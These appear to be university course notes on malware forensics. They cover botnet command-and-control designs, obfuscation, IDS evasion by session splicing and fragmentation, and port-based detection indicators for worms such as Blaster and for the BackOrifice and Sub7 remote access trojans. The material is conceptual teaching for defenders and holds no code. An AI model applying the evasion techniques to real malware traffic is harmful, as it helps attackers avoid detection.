16

Cyber Security and Cryptography

Hashing1.1 Cyber Security1.2 Intrusion Detection and Prevention Systems1.3 Firewalls2.1 Encoding Formats2.1 Ciphers and Fundamentals2.1 Public key, private key and key exchange2.2 Authentication and Hashing2.3 Digital Certificates3.1 Network Forensics3.2 Penetration Testing3.3 Malware Analysis3.3 Attack Analysis4.1 Tunneling4.2 Authentication, Identity and TrustBotnet Coursework

3.3 Malware Analysis

Week 3 Day 3 - Malware Analysis & Attack Analysis

Last Update Unknown

Malware Forensics

Computers have evolved to be increasingly networked, so too has malware.


Goals:

  • Understanding malware and associated vulnerabilities in order to produce antivirus/IDS signatures
  • Detecting compromised systems on the network
  • Determining the scope of a breach, after the fact
  • Containing an infection
  • Tracking down the source of malware
  • Gathering evidence for court

Trends in Malware Evolution

Early malware was spread via floppy disks by infecting the MBR upon boot through transfer of infected files/programs (freeware utilities).

USB drives/physical devices are still a notable source of malware.


The vast majority of malware activity occurs over the network

  • Injected via a physical storage medium
  • Communicates over the network after infecting a new host


Malware has become more dependent on the network for:

  • Propagation
  • Control
  • Payload functionality


Overlap between Network Forensics and Malware Analysis

Botnet

Modern Botnet, the convergence of:

  • Advancements in remote control
  • Automated propagation
  • Hierarchical and distributed management techniques


Evolution of botnets influenced by:

  • Development of IDS
  • To incorporate sophisticated IDS evasion and sophisticated features


Botnets are valuable commodities

  • Rented and sold through underground black markets

For:

  • Distributing spam
  • Coordinating DDoS attacks
  • Stealing financial information


Remote Access Trojans (RATs)

To facilitate remote control of individual compromised endpoints


Implications for Network Forensics

Most publicised aspects of malware analysis for forensic investigator:

  • Focus on reverse-engineering
  • The behaviour of samples caught “in the wild”
  • To understand the nature/mechanisms of compromise
  • To develop antivirus/IDS signatures for detecting the malware
  • By identifying a known-to-be-compromised host
  • Extracting the malicious code from system (memory/disk)


Challenge:

  • Obfuscate/hide codes

Encryption and Obfuscation

Malware authors use encryption to:

  • Hide functionality
  • Create random - appearing payloads
  • Difficult for antivirus/IDS/forensic investigator to detect
  • Sophisticated techniques to obscure decryptors & keys


Encrypted malware since the early 1990s

  • Example: “Cascade” virus
  • Encrypted payload to avoid detection by antivirus
  • Cause changes in the screen: all the letters on the screen dropped to bottom


Forensic investigators:

  • Turn to statistical flow analysis
  • Rather than content-based analysis
  • To efficiently detect and dissect malware

Early IDS/Antivirus Evasion

Session splicing:

  • Chops up a string from a session and splits it across multiple packets
  • To foil NIDS/NIPS pattern matching
  • NIDS/NIPS needs to reassemble the session to detect the string
  • Resource intensive for NIDS/NIPS


Fragmentation:

  • To split individual packets into smaller
  • NIDS/NIPS must reassemble the packet fragments to analyse
  • Resource intensive for NIDS/NIPS

Modern Web Obfuscation/Encryption

Modern malware is often web-based

  • Obfuscation techniques to embed malicious code
    • JavaScript in web pages
  • Takes the form of “Base64/XOR-ing/even more complex” to evade web filters and NIDS/NIPS systems
  • Web filters and NIDS/NIPS systems often unable to properly de-obfuscate on the fly

Hiding C&C Channels

Modern malware incorporating obfuscation & encryption:

  • To disguise the injection vectors and payloads
  • To hide the content of the C&C channel
Allows botnets to evade detection & analysis through packet contents analysis

Distributed Command-and-Control Systems

  • Maintaining control of zombies: challenging & important
  • Today, hackers have such excellent control over their networks
  • Able to segment and sell botnets through underground black markets
  • Easily transfer control to third parties
  • Evolved from simple, direct connections with central servers (IRC)
  • To highly complex, distributed, redundant multi-layer systems with built-in security features

The Early Days: Internet Relay Chat (IRC)

Early botnets relied upon centralised control systems where zombies communicated directly with central servers.
Very common mechanism for malware C&C:
  • Internet Relay Chat (IRC)
  • Malware was hard-coded with:
    • Server IP addresses or domain names
    • IRC channel information
  • Allows zombies connected back to C&C centre
    • To drop off information about infected systems
    • Or receive commands and updates

Evolution Toward Distributed C&C

  • Newer botnets moving toward partially distributed and are not fully C&C architecture
  • Zombies do not connect directly back to a central server
  • Zombies connect to servers in a redundant, distributed network
  • A multilevel hierarchy
  • Systems at each level communicate with each other
  • At least some systems in each level can communicate with systems in the level above

Updates from a small number of C&C servers

  • Too many zombies
  • Zombies can pass information back up the chain
  • Far greater redundancy
  • Lower risk of detection/disruption

Peer-to-Peer C&C

  • Took distributed C&C to new extremes using P2P protocols
  • At the beginning of the attack:
    • Zombie attempts to link up with other zombies via P2P networking

Metamorphic Network Behaviour

Early malware had relatively static behaviour

  • Using specific ports/protocols
  • Used by network analysts to develop antivirus/IDS signatures


Static behaviour Example:

  • W32/Blaster could be detected by searching for unexpected traffic on TCP 135, TCP 4444, and/or UDP 69
  • W32/Witty could be found by alerting on source port UDP 4000

BackOrifice & Sub7:

  • Allows to customize ports/payloads for individual zombie
  • But frequently these daemons were installed on default ports such as TCP 31337 (BackOrifice) or TCP 27573 (Sub7)


Malware with static network behaviours can be easily blocked using firewall rules/router ACLs

Evading solution:

  • Dynamic network behaviour:
    • Multiple propagation strategies
    • Variable daemon ports
    • Sophisticated scanning algorithms

Multiple Propagation Strategies

Zombies can include multiple methods for:

  • Exploiting new systems
  • Fooling simple port-blocking
  • Fooling simple router ACLs
  • IDS rules


Nimda (2001) spread very quickly due to multiple propagation strategies:

  • Infection of vulnerable IIS web servers
  • Bulk emails
  • Scanning for back doors left by other worms
  • Open network shares

This created a variety of patterns on the network:

  • HTTP traffic
  • SMTP traffic
  • File sharing traffic

Variable Daemon Ports

Port-blocking

  • One of the simplest/oldest methods of stopping malware

Many malware dynamically change their C&C & malware distribution ports to evade this detection.

Network Behaviour of Malware

Bad news for defender:

  • The authors of today’s malware are sophisticated in their strategies

Good news for defender:

  • Sooner or later the malicious agent will create or modify network traffic


Network traffic involving zombies compared with the same network without zombies: different traffic pattern.

However, malware authors are improving their techniques for blending with normal traffic and piggybacking on common activities (web surfing).

Propagation

Some of the most common propagation techniques:

  • Email
  • Web links and content
  • Network shares
  • Direct network-based exploitation


Search for signatures of the malware:

  • Packet payload content
  • Sizes of transferred data
  • Statistical flow analysis of ports and targeted addresses

Evidence of malware propagation is filtered by: web proxies/email proxies

Command-and-Control Communications

C&C channels allow remote attackers to manage and update zombies remotely.

Double-edged sword for both the malware developer and the network forensic investigators.

Common vectors for C&C channel:

  • HTTP
  • Social networking sites
  • Peer-to-peer
  • IRC
  • Cloud computing environments


Modern malware C&C channels are integrated into:

  • Web traffic
  • Social networking sites
  • And other less obvious traffic

C&C channels are also developed to operate using multiple strategies in case one is cut off e.g. Receive updates through distributed networks.


Forensic Guide

Detect & analyse C&C traffic by statistical flow analysis.

By noting changes in volume, directionality, sources and destinations, and timing of flow patterns.

If the traffic is not encrypted or there are specific markers in packet contents and headers:

  • Content-based alerting mechanisms may be deployed

Payload Behaviour

Depending on:

  • The malware author's intent
  • The environment
  • Typically, zombie behaviour tends to include:
    • SPAM
    • DoS
    • Pirated software hosting
    • Confidential information theft (spyware)
    • Scanning for reconnaissance
    • Keylogging


Forensic Guide

Each generates a different pattern of network traffic. Some designed for stealthy, long-term infiltration. May lay dormant on the network for months or years until activated.